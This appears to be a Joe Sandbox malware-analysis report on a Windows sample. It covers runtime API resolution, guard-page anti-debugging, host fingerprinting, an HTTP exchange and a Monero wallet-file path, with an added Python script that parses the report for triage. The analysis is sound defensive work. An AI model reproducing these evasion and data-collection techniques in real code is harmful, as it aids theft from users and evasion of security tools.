14250->14251 14252 d832b7 14251->14252 14253 d845c0 2 API calls 14252->14253 14254 d832d0 14253->14254 14255 d845c0 2 API calls 14254->14255 14256 d832e9 14255->14256 14257 d845c0 2 API calls 14256->14257 14258 d83302 14257->14258 14259 d845c0 2 API calls 14258->14259 14260 d8331b 14259->14260 14261 d845c0 2 API calls 14260->14261 14262 d83334 14261->14262 14263 d845c0 2 API calls 14262->14263 14264 d8334d 14263->14264 14265 d845c0 2 API calls 14264->14265 14266 d83366 14265->14266 14267 d845c0 2 API calls 14266->14267 14268 d8337f 14267->14268 14269 d845c0 2 API calls 14268->14269 14270 d83398 14269->14270 14271 d845c0 2 API calls 14270->14271 14272 d833b1 14271->14272 14273 d845c0 2 API calls 14272->14273 14274 d833ca 14273->14274 14275 d845c0 2 API calls 14274->14275 14276 d833e3 14275->14276 14277 d845c0 2 API calls 14276->14277 14278 d833fc 14277->14278 14279 d845c0 2 API calls 14278->14279 14280 d83415 14279->14280 14281 d845c0 2 API calls 14280->14281 14282 d8342e 14281->14282 14283 d845c0 2 API calls 14282->14283 14284 d83447 14283->14284 14285 d845c0 2 API calls 14284->14285 14286 d83460 14285->14286 14287 d845c0 2 API calls 14286->14287 14288 d83479 14287->14288 14289 d845c0 2 API calls 14288->14289 14290 d83492 14289->14290 14291 d845c0 2 API calls 14290->14291 14292 d834ab 14291->14292 14293 d845c0 2 API calls 14292->14293 14294 d834c4 14293->14294 14295 d845c0 2 API calls 14294->14295 14296 d834dd 14295->14296 14297 d845c0 2 API calls 14296->14297 14298 d834f6 14297->14298 14299 d845c0 2 API calls 14298->14299 14300 d8350f 14299->14300 14301 d845c0 2 API calls 14300->14301 14302 d83528 14301->14302 14303 d845c0 2 API calls 14302->14303 14304 d83541 14303->14304 14305 d845c0 2 API calls 14304->14305 14306 d8355a 14305->14306 14307 d845c0 2 API calls 14306->14307 14308 d83573 14307->14308 14309 d845c0 2 API calls 14308->14309 14310 d8358c 14309->14310 14311 d845c0 2 API calls 14310->14311 14312 d835a5 14311->14312 14313 d845c0 2 API calls 14312->14313 
Execution Graph (continued): Joe Sandbox renders this part of the report as a call graph; only the node and edge list survived extraction. What is recoverable from it: a long straight-line chain from d835be to d845a9 in which every node calls d845c0 (2 API calls each); an API-resolution routine at d99c10 (d9a036 to d9a6a7) consisting mostly of repeated GetProcAddress calls; string-handling wrappers built on lstrcpy, lstrcat and lstrlen (d9a740, d9a7a0, d9a820, d9a8a0, d9a920, d9a9b0) with StrCmpCA comparisons, including a StrCmpCA at d917c4 whose one branch leads to ExitProcess at d917cf and a StrCmpCA at d95a0b whose one branch leads to Sleep at d95a16; a WinINet exchange using InternetCrackUrlA, InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile and InternetCloseHandle (and, separately, InternetOpenUrlA), followed by CryptStringToBinaryA with LocalAlloc/LocalFree at d89ac0; host fingerprinting through GetVolumeInformationA, GetCurrentProcess/IsWow64Process, GetLocalTime, GetTimeZoneInformation, GetUserDefaultLocaleName (with CharToOemW), GetKeyboardLayoutList/GetLocaleInfoA, GetSystemPowerStatus, GetCurrentProcessId/OpenProcess/GetModuleFileNameExA, GetLogicalProcessorInformationEx, GetSystemInfo, GlobalMemoryStatusEx and RegOpenKeyExA/RegEnumKeyExA/RegQueryValueExA/RegCloseKey; and process enumeration through CreateToolhelp32Snapshot, Process32First and Process32Next. Buffers are obtained from GetProcessHeap/RtlAllocateHeap and formatted with wsprintfA.
15960->15961 15962 d97765 RegQueryValueExA 15960->15962 15963 d97793 15961->15963 15962->15961 15963->15959 15964->15845 15966 d989f9 GetProcessHeap HeapFree 15965->15966 15967 d98a0c 15965->15967 15966->15967 15967->15882 15968->15882 15970 d9a7a0 lstrcpy 15969->15970 15971 d85119 15970->15971 15972 d847b0 2 API calls 15971->15972 15973 d85125 15972->15973 16129 d98ea0 15973->16129 15975 d85184 15976 d85192 lstrlen 15975->15976 15977 d851a5 15976->15977 15978 d98ea0 4 API calls 15977->15978 15979 d851b6 15978->15979 15980 d9a740 lstrcpy 15979->15980 15981 d851c9 15980->15981 15982 d9a740 lstrcpy 15981->15982 15983 d851d6 15982->15983 15984 d9a740 lstrcpy 15983->15984 15985 d851e3 15984->15985 15986 d9a740 lstrcpy 15985->15986 15987 d851f0 15986->15987 15988 d9a740 lstrcpy 15987->15988 15989 d851fd InternetOpenA StrCmpCA 15988->15989 15990 d8522f 15989->15990 15991 d858c4 InternetCloseHandle 15990->15991 15992 d98b60 3 API calls 15990->15992 15998 d858d9 ctype 15991->15998 15993 d8524e 15992->15993 15994 d9a920 3 API calls 15993->15994 15995 d85261 15994->15995 15996 d9a8a0 lstrcpy 15995->15996 15997 d8526a 15996->15997 15999 d9a9b0 4 API calls 15997->15999 16001 d9a7a0 lstrcpy 15998->16001 16000 d852ab 15999->16000 16002 d9a920 3 API calls 16000->16002 16010 d85913 16001->16010 16003 d852b2 16002->16003 16004 d9a9b0 4 API calls 16003->16004 16005 d852b9 16004->16005 16006 d9a8a0 lstrcpy 16005->16006 16007 d852c2 16006->16007 16008 d9a9b0 4 API calls 16007->16008 16009 d85303 16008->16009 16011 d9a920 3 API calls 16009->16011 16010->15956 16012 d8530a 16011->16012 16013 d9a8a0 lstrcpy 16012->16013 16014 d85313 16013->16014 16015 d85329 InternetConnectA 16014->16015 16015->15991 16016 d85359 HttpOpenRequestA 16015->16016 16018 d858b7 InternetCloseHandle 16016->16018 16019 d853b7 16016->16019 16018->15991 16020 d9a9b0 4 API calls 16019->16020 16021 d853cb 16020->16021 16022 d9a8a0 lstrcpy 16021->16022 16023 d853d4 16022->16023 16024 d9a920 3 API calls 16023->16024 
16025 d853f2 16024->16025 16026 d9a8a0 lstrcpy 16025->16026 16027 d853fb 16026->16027 16028 d9a9b0 4 API calls 16027->16028 16029 d8541a 16028->16029 16030 d9a8a0 lstrcpy 16029->16030 16031 d85423 16030->16031 16032 d9a9b0 4 API calls 16031->16032 16033 d85444 16032->16033 16034 d9a8a0 lstrcpy 16033->16034 16035 d8544d 16034->16035 16036 d9a9b0 4 API calls 16035->16036 16037 d8546e 16036->16037 16038 d9a8a0 lstrcpy 16037->16038 16130 d98ead CryptBinaryToStringA 16129->16130 16134 d98ea9 16129->16134 16131 d98ece GetProcessHeap RtlAllocateHeap 16130->16131 16130->16134 16132 d98ef4 ctype 16131->16132 16131->16134 16133 d98f05 CryptBinaryToStringA 16132->16133 16133->16134 16134->15975 16138->15411 16381 d89880 16139->16381 16141 d898e1 16141->15418 16143 d9a740 lstrcpy 16142->16143 16316 d9a740 lstrcpy 16315->16316 16317 d90266 16316->16317 16318 d98de0 2 API calls 16317->16318 16319 d9027b 16318->16319 16320 d9a920 3 API calls 16319->16320 16321 d9028b 16320->16321 16322 d9a8a0 lstrcpy 16321->16322 16323 d90294 16322->16323 16324 d9a9b0 4 API calls 16323->16324 16325 d902b8 16324->16325 16382 d8988e 16381->16382 16385 d86fb0 16382->16385 16384 d898ad ctype 16384->16141 16388 d86d40 16385->16388 16389 d86d63 16388->16389 16396 d86d59 16388->16396 16389->16396 16402 d86660 16389->16402 16391 d86dbe 16391->16396 16408 d869b0 16391->16408 16393 d86e2a 16394 d86ee6 VirtualFree 16393->16394 16393->16396 16397 d86ef7 16393->16397 16394->16397 16395 d86f41 16395->16396 16398 d989f0 2 API calls 16395->16398 16396->16384 16397->16395 16399 d86f38 16397->16399 16400 d86f26 FreeLibrary 16397->16400 16398->16396 16401 d989f0 2 API calls 16399->16401 16400->16397 16401->16395 16407 d8668f VirtualAlloc 16402->16407 16404 d86730 16405 d86743 VirtualAlloc 16404->16405 16406 d8673c 16404->16406 16405->16406 16406->16391 16407->16404 16407->16406 16409 d869c9 16408->16409 16414 d869d5 16408->16414 16410 d86a09 LoadLibraryA 16409->16410 16409->16414 16411 d86a32 16410->16411 
16410->16414 16417 d86ae0 16411->16417 16418 d98a10 GetProcessHeap RtlAllocateHeap 16411->16418 16413 d86ba8 GetProcAddress 16413->16414 16413->16417 16414->16393 16415 d989f0 2 API calls 16415->16417 16416 d86a8b 16416->16414 16416->16415 16417->16413 16417->16414 16418->16416 17885 123236e 17886 1232e7b VirtualProtect 17885->17886 17888 1232ebd 17886->17888

                                Control-flow Graph

                                Function 00D99860, basic blocks recovered from the graph data (node, address range, calls, successors):
                                660  d99860-d99874  call d99750                        -> 663, 664
                                663  d9987a-d99a8e  call d99780; GetProcAddress x21     -> 664
                                664  d99a93-d99af2  LoadLibraryA x5                     -> 665, 666
                                666  d99af4-d99b08  GetProcAddress                      -> 665
                                665  d99b0d-d99b14                                      -> 668, 669
                                669  d99b16-d99b41  GetProcAddress x2                   -> 668
                                668  d99b46-d99b4d                                      -> 671, 672
                                672  d99b4f-d99b63  GetProcAddress                      -> 671
                                671  d99b68-d99b6f                                      -> 673, 674
                                674  d99b71-d99b84  GetProcAddress                      -> 673
                                673  d99b89-d99b90                                      -> 675, 676
                                676  d99b92-d99bbc  GetProcAddress x2                   -> 675
                                675  d99bc1-d99bc2  (exit)
                                Reading: one straight-line block resolves 21 exports from a module that is already in memory, five LoadLibraryA calls follow, and each of the five tail blocks resolves one or two further exports behind a branch (a NULL-handle check is the usual reason for that shape, although the graph data does not record the condition).
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,018224A0), ref: 00D998A1
                                • GetProcAddress.KERNEL32(74DD0000,018224B8), ref: 00D998BA
                                • GetProcAddress.KERNEL32(74DD0000,018223B0), ref: 00D998D2
                                • GetProcAddress.KERNEL32(74DD0000,018224D0), ref: 00D998EA
                                • GetProcAddress.KERNEL32(74DD0000,01822350), ref: 00D99903
                                • GetProcAddress.KERNEL32(74DD0000,01829018), ref: 00D9991B
                                • GetProcAddress.KERNEL32(74DD0000,018158B0), ref: 00D99933
                                • GetProcAddress.KERNEL32(74DD0000,01815830), ref: 00D9994C
                                • GetProcAddress.KERNEL32(74DD0000,01822218), ref: 00D99964
                                • GetProcAddress.KERNEL32(74DD0000,01822308), ref: 00D9997C
                                • GetProcAddress.KERNEL32(74DD0000,01822500), ref: 00D99995
                                • GetProcAddress.KERNEL32(74DD0000,01822320), ref: 00D999AD
                                • GetProcAddress.KERNEL32(74DD0000,018158D0), ref: 00D999C5
                                • GetProcAddress.KERNEL32(74DD0000,01822230), ref: 00D999DE
                                • GetProcAddress.KERNEL32(74DD0000,018222C0), ref: 00D999F6
                                • GetProcAddress.KERNEL32(74DD0000,018156D0), ref: 00D99A0E
                                • GetProcAddress.KERNEL32(74DD0000,01822368), ref: 00D99A27
                                • GetProcAddress.KERNEL32(74DD0000,01822398), ref: 00D99A3F
                                • GetProcAddress.KERNEL32(74DD0000,01815870), ref: 00D99A57
                                • GetProcAddress.KERNEL32(74DD0000,018222D8), ref: 00D99A70
                                • GetProcAddress.KERNEL32(74DD0000,018158F0), ref: 00D99A88
                                • LoadLibraryA.KERNEL32(01822578,?,00D96A00), ref: 00D99A9A
                                • LoadLibraryA.KERNEL32(01822590,?,00D96A00), ref: 00D99AAB
                                • LoadLibraryA.KERNEL32(01822518,?,00D96A00), ref: 00D99ABD
                                • LoadLibraryA.KERNEL32(018225D8,?,00D96A00), ref: 00D99ACF
                                • LoadLibraryA.KERNEL32(018225A8,?,00D96A00), ref: 00D99AE0
                                • GetProcAddress.KERNEL32(75A70000,018225C0), ref: 00D99B02
                                • GetProcAddress.KERNEL32(75290000,01822530), ref: 00D99B23
                                • GetProcAddress.KERNEL32(75290000,01822548), ref: 00D99B3B
                                • GetProcAddress.KERNEL32(75BD0000,01822560), ref: 00D99B5D
                                • GetProcAddress.KERNEL32(75450000,01815710), ref: 00D99B7E
                                • GetProcAddress.KERNEL32(76E90000,018290D8), ref: 00D99B9F
                                • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00D99BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00D99BAA
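                                Read together, the list above says three things: all 21 initial GetProcAddress calls use one module base (74DD0000), five LoadLibraryA calls follow before any other base appears, and every name argument but one is a pointer in the 0181xxxx-0182xxxx range, which lies outside the dump ranges listed under Memory Dump Source (assuming the last dump, which starts at 0140D000, does not extend that far), so the names were produced in memory the sample allocated itself rather than stored as literals. The one literal is NtQueryInformationProcess, an ntdll export, so 76E90000 is ntdll's base in this run. The script below, an added example that is not part of the Joe Sandbox report or of the sample, parses lines in the report's "APIs" format and computes those facts; the image bounds it uses are an assumption taken from the first and last dump offsets above:

```python
"""Added example (not Joe Sandbox or sample code): parse the 'APIs' list of a
Joe Sandbox function page and summarise how the function resolves imports at
run time. REPORT_LINES is copied from the list for function 00D99860.
IMAGE_RANGE is an assumption taken from the Memory Dump Source list (first dump
at 00D80000, last dump starts at 0140D000; its size is not given)."""
import re
from collections import Counter

REPORT_LINES = """
GetProcAddress.KERNEL32(74DD0000,018224A0), ref: 00D998A1
GetProcAddress.KERNEL32(74DD0000,018224B8), ref: 00D998BA
GetProcAddress.KERNEL32(74DD0000,018223B0), ref: 00D998D2
GetProcAddress.KERNEL32(74DD0000,018224D0), ref: 00D998EA
GetProcAddress.KERNEL32(74DD0000,01822350), ref: 00D99903
GetProcAddress.KERNEL32(74DD0000,01829018), ref: 00D9991B
GetProcAddress.KERNEL32(74DD0000,018158B0), ref: 00D99933
GetProcAddress.KERNEL32(74DD0000,01815830), ref: 00D9994C
GetProcAddress.KERNEL32(74DD0000,01822218), ref: 00D99964
GetProcAddress.KERNEL32(74DD0000,01822308), ref: 00D9997C
GetProcAddress.KERNEL32(74DD0000,01822500), ref: 00D99995
GetProcAddress.KERNEL32(74DD0000,01822320), ref: 00D999AD
GetProcAddress.KERNEL32(74DD0000,018158D0), ref: 00D999C5
GetProcAddress.KERNEL32(74DD0000,01822230), ref: 00D999DE
GetProcAddress.KERNEL32(74DD0000,018222C0), ref: 00D999F6
GetProcAddress.KERNEL32(74DD0000,018156D0), ref: 00D99A0E
GetProcAddress.KERNEL32(74DD0000,01822368), ref: 00D99A27
GetProcAddress.KERNEL32(74DD0000,01822398), ref: 00D99A3F
GetProcAddress.KERNEL32(74DD0000,01815870), ref: 00D99A57
GetProcAddress.KERNEL32(74DD0000,018222D8), ref: 00D99A70
GetProcAddress.KERNEL32(74DD0000,018158F0), ref: 00D99A88
LoadLibraryA.KERNEL32(01822578,?,00D96A00), ref: 00D99A9A
LoadLibraryA.KERNEL32(01822590,?,00D96A00), ref: 00D99AAB
LoadLibraryA.KERNEL32(01822518,?,00D96A00), ref: 00D99ABD
LoadLibraryA.KERNEL32(018225D8,?,00D96A00), ref: 00D99ACF
LoadLibraryA.KERNEL32(018225A8,?,00D96A00), ref: 00D99AE0
GetProcAddress.KERNEL32(75A70000,018225C0), ref: 00D99B02
GetProcAddress.KERNEL32(75290000,01822530), ref: 00D99B23
GetProcAddress.KERNEL32(75290000,01822548), ref: 00D99B3B
GetProcAddress.KERNEL32(75BD0000,01822560), ref: 00D99B5D
GetProcAddress.KERNEL32(75450000,01815710), ref: 00D99B7E
GetProcAddress.KERNEL32(76E90000,018290D8), ref: 00D99B9F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00D99BB6
"""
IMAGE_RANGE = (0x00D80000, 0x0140E000)  # assumed bounds of the dumped image, see docstring

# One report line: Api.DLL(arg,arg,...), ref: ADDRESS
API_LINE = re.compile(r"(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")


def parse_api_lines(text):
    """Return the calls in address order as dicts: api, dll, args (raw strings), ref (int)."""
    calls = []
    for m in API_LINE.finditer(text):
        calls.append({"api": m.group("api"), "dll": m.group("dll"),
                      "args": [a.strip() for a in m.group("args").split(",")],
                      "ref": int(m.group("ref"), 16)})
    return sorted(calls, key=lambda c: c["ref"])


def summarize_resolution(calls, image_range=IMAGE_RANGE):
    """Group GetProcAddress calls by module base and classify each name argument.
    A plain-string name was a literal the sandbox could read; a pointer outside
    the image range points into memory the sample allocated itself, i.e. the
    name was decoded or assembled at run time."""
    lo, hi = image_range
    per_module, plaintext = Counter(), []
    pointers_outside_image = 0
    first_load = None          # ref of the first LoadLibraryA, once seen
    before_load = set()        # module bases used before any LoadLibraryA
    for c in calls:
        if c["api"] == "LoadLibraryA" and first_load is None:
            first_load = c["ref"]
        if c["api"] != "GetProcAddress":
            continue
        base, name = c["args"][0], c["args"][1]
        per_module[base] += 1
        if first_load is None:
            before_load.add(base)
        if HEX32.match(name):
            pointers_outside_image += not (lo <= int(name, 16) < hi)
        else:
            plaintext.append(name)
    return {"per_module": dict(per_module),
            "plaintext_names": plaintext,
            "name_pointers_outside_image": pointers_outside_image,
            "bases_resolved_before_LoadLibraryA": sorted(before_load),
            "loadlibrary_calls": sum(c["api"] == "LoadLibraryA" for c in calls)}


if __name__ == "__main__":
    for key, value in summarize_resolution(parse_api_lines(REPORT_LINES)).items():
        print(f"{key}: {value}")
```

The same parser works on any function page of the report; the useful signal for triage is a high GetProcAddress count against a base with pointer-only name arguments, since a statically linked import table would show those names as literals.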
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 32074da65ef329ce9a2169481c2d9ce22956dca5cafc0b2b5d24d6d2fb01b344
                                • Instruction ID: 24f79b8c175691ffacd5558058325feb997bef1ad950e153ee04c5e3ad554fce
                                • Opcode Fuzzy Hash: 32074da65ef329ce9a2169481c2d9ce22956dca5cafc0b2b5d24d6d2fb01b344
                                • Instruction Fuzzy Hash: 40A15CB550024C9FD344EFA8FF8AD5637F9FB8C309704851AA605C32A4D639B852FB26

                                Control-flow Graph

                                Function 00D845C0, basic blocks recovered from the graph data:
                                764  d845c0-d84695  RtlAllocateHeap   -> 781
                                781  d846a0-d846a6  (loop test)       -> 782, 783
                                782  d846ac-d8474a  (loop body)       -> 781
                                783  d8474f-d847a9  VirtualProtect    (exit)
                                Reading: allocate a heap block, iterate over it, then change the protection of a 4-byte range to 0x100 = PAGE_GUARD (see the APIs below). This is the guard-page technique behind the "create guard pages" entry in the overview: the first access to a guard page raises STATUS_GUARD_PAGE_VIOLATION, an exception that debuggers commonly intercept before the program's own handler sees it.
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D8460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00D8479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., 30 xrefs, in runs of five spaced 11 bytes apart: 00D845C7, 00D845D2, 00D845DD, 00D845E8, 00D845F3, 00D84617, 00D84622, 00D8462D, 00D84638, 00D84643, 00D84657, 00D84662, 00D8466D, 00D84678, 00D84683, 00D846AC, 00D846B7, 00D846C2, 00D846CD, 00D846D8, 00D84713, 00D8471E, 00D84729, 00D84734, 00D8473F, 00D8474F, 00D8475A, 00D84765, 00D84770, 00D8477B
                                Note: this is benign filler text referenced from short repeated instruction sequences throughout the function; treat it as padding, not as a detection indicator on its own.
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: the same 14 dumps listed under Memory Dump Source for function 00D99860 above (00D80000 through 0140D000)
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated 30 times, once per xref)
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: a84de6ed6e0af61669e2aa44edaec23a961ca905390f7ee93330d7020075aef6
                                • Instruction ID: 55fc6f21b8a1fb3568d9deca267d5ffd9a03a3f37d01fefa8e528dcaeae40b89
                                • Opcode Fuzzy Hash: a84de6ed6e0af61669e2aa44edaec23a961ca905390f7ee93330d7020075aef6
                                • Instruction Fuzzy Hash: 9741EE607C3709FF8E64FBA8A94EEDD77565F47720FD07A44EE0092284CAA059084637

                                Control-flow Graph

                                Function 00D84880 (HTTP request/response), basic blocks recovered from the graph data; the string-helper calls (d9a740, d9a7a0, d9a800, d9a8a0, d9a920, d9a9b0, d9aad0) that fill most blocks are summarised as "build strings":
                                801   d84880-d84942  build strings; call d847b0; InternetOpenA; StrCmpCA   -> 816, 817
                                817   d84944                                                          -> 816
                                816   d8494b-d8494f                                                   -> 818, 819
                                819   d84955-d84acd  call d98b60; build strings; InternetConnectA      -> 818, 905
                                905   d84ad3-d84ad7                                                   -> 906, 907
                                906   d84ad9-d84ae3                                                   -> 908
                                907   d84ae5                                                          -> 908
                                908   d84aef-d84b22  HttpOpenRequestA                                 -> 909, 910
                                909   d84b28-d84e28  build strings; lstrlen x2; HttpSendRequestA      -> 1021
                                1021  d84e32-d84e5c  InternetReadFile                                 -> 1022, 1023
                                1022  d84e5e-d84e65                                                   -> 1023, 1025
                                1025  d84e69-d84ea7  build strings (append chunk)                     -> 1021
                                1023  d84e67-d84eb9  InternetCloseHandle; call d9a800                 -> 910
                                910   d84ebe-d84ec5  InternetCloseHandle                              -> 818
                                818   d84ecb-d84ef3  InternetCloseHandle; call d9aad0; call d89ac0    -> 829, 830
                                830   d84ef5-d84f2d  build strings                                    -> 829
                                829   d84f32-d84fa2  call d98990 x2; build strings; call d9a800 x8    (exit)
                                Reading: open a WinINet session, compare a hostname with StrCmpCA, connect, open and send the request, then loop on InternetReadFile in 0x7CF-byte chunks (1021 -> 1022 -> 1025 -> 1021), appending each chunk with the lstrcpy/lstrcat helper d9a9b0 until the loop exits at 1022; close the request, connection and session handles and pass the buffer to d89ac0, which the call-graph data shows reaching LocalAlloc, CryptStringToBinaryA and LocalFree, i.e. a string-to-binary decode of the response.
                                APIs
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D84839
                                  • Part of subcall function 00D847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D84849
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D84915
                                • StrCmpCA.SHLWAPI(?,0182EB68), ref: 00D8493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D84ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00DA0DDB,00000000,?,?,00000000,?,",00000000,?,0182EA18), ref: 00D84DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00D84E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00D84E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D84E49
                                • InternetCloseHandle.WININET(00000000), ref: 00D84EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00D84EC5
                                • HttpOpenRequestA.WININET(00000000,0182EB78,?,0182E1B0,00000000,00000000,00400100,00000000), ref: 00D84B15
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                • InternetCloseHandle.WININET(00000000), ref: 00D84ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: d9d37ab21e6c89a6f11d9b258dcb62954d1fc0df4723f1a65a2b057452d596d7
                                • Instruction ID: 8a877237b63dd658d55cab167b4eb3098b1d3ff57ebc033507037930e700aaca
                                • Opcode Fuzzy Hash: d9d37ab21e6c89a6f11d9b258dcb62954d1fc0df4723f1a65a2b057452d596d7
                                • Instruction Fuzzy Hash: 30129772920128AADF15EBA4DD92FEEB779FF15300F504199B10662091EF706B49CFB2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D97910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D97917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00D9792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
